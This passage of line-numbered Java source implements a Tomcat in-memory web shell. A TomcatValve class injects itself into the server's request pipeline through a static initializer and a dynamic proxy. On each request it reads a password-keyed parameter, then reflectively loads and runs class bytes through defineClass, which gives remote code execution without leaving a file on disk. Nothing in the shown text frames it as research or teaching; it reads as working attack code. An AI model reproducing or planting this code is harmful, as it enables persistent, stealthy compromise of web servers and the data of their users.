= java.security.SecureClassLoader.class 818 | .getDeclaredConstructor(ClassLoader.class); 819 | constructor.setAccessible(true); 820 | ClassLoader classloader = (ClassLoader) constructor.newInstance( 821 | new Object[]{this.getClass().getClassLoader()} 822 | ); 823 | Method defineMethod = ClassLoader.class.getDeclaredMethod( 824 | "defineClass", byte[].class, int.class, int.class 825 | ); 826 | defineMethod.setAccessible(true); 827 | ((Class) defineMethod.invoke(classloader, b, 0, b.length)) 828 | .newInstance().equals(pageContext); 829 | } 830 | return null; 831 | } 832 | 833 | private void hook(Object request, Object response) throws Exception { 834 | String payload = (String) invokeMethod( 835 | request, "getParameter", password 836 | ); 837 | stub(payload, request, response); 838 | } 839 | 840 | @Override 841 | public Object invoke(Object proxy, Method method, Object[] args) 842 | throws Throwable { 843 | String methodName = method.getName(); 844 | if (methodName.equals("invoke")) { 845 | Object request = args[0]; 846 | Object response = args[1]; 847 | hook(request, response); 848 | Method invoke = getMethodX(nextvalve.getClass(), "invoke", 2); 849 | invoke.setAccessible(true); 850 | invoke.invoke(nextvalve, request, response); 851 | } else if (methodName.equals("setNext")) { 852 | nextvalve = args[0]; 853 | } else if (methodName.equals("getNext")) { 854 | return nextvalve; 855 | } else if (methodName.equals("toString")) { 856 | return this.getClass().getName(); 857 | } else if (methodName.equals("isAsyncSupported")) { 858 | return false; 859 | } 860 | return null; 861 | } 862 | 863 | private void addValve(Object proxyObject) throws Exception { 864 | Object context = getStandardContext(); 865 | Object pipeline = invokeMethod(context, "getPipeline"); 866 | getMethodX(pipeline.getClass(), "addValve", 1) 867 | .invoke(pipeline, proxyObject); 868 | } 869 | 870 | public TomcatValve() { 871 | synchronized(lock) { 872 | Class valveClass = null; 873 | try { 874 | valveClass = Class.forName( 875 | "org.apache.catalina.Valve" 876 | ); 877 | } catch (ClassNotFoundException e) {} 878 | 879 | if (valveClass != null) { 880 | Object proxyObject = Proxy.newProxyInstance( 881 | getLoader(), 882 | new Class[]{valveClass}, 883 | this 884 | ); 885 | try { 886 | addValve(proxyObject); 887 | } catch (Exception e) {} 888 | } 889 | } 890 | } 891 | 892 | static { 893 | new TomcatValve(); 894 | } 895 | } 896 | ` 897 | } 898 | --------------------------------------------------------------------------------